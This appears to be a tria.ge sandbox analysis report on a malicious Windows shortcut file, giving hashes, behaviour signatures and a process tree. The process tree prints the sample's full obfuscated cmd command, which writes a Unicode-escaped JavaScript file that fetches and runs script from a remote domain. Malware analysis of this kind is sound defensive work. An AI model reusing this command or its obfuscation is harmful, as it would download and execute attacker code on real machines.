Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
17/01/2024, 19:05
Static task
static1
Behavioral task
behavioral1
Sample
26586807.lnk
Resource
win7-20231215-en
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
26586807.lnk
Resource
win10v2004-20231215-en
6 signatures
150 seconds
General
-
Target
26586807.lnk
-
Size
1KB
-
MD5
bc345cb4f475cf31bd47c9bbbeebc376
-
SHA1
53a989af0ea25a20c022db6d5cda0204dc53d0c5
-
SHA256
8051b39e71554eb5e1bb9455160957c5a5aae1e24f261052e8e871e93420adfc
-
SHA512
8e4eca9cdddd877c7db0411a3a809733660db7e8ebc877870a10b901beb97218b6bb586b5499dc14d3df831d9327fd0ab26b5f336a939997cccfc2bb6e4fc3ef
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1900 wrote to memory of 2868 1900 cmd.exe 29 PID 1900 wrote to memory of 2868 1900 cmd.exe 29 PID 1900 wrote to memory of 2868 1900 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\26586807.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "2⤵PID:2868
-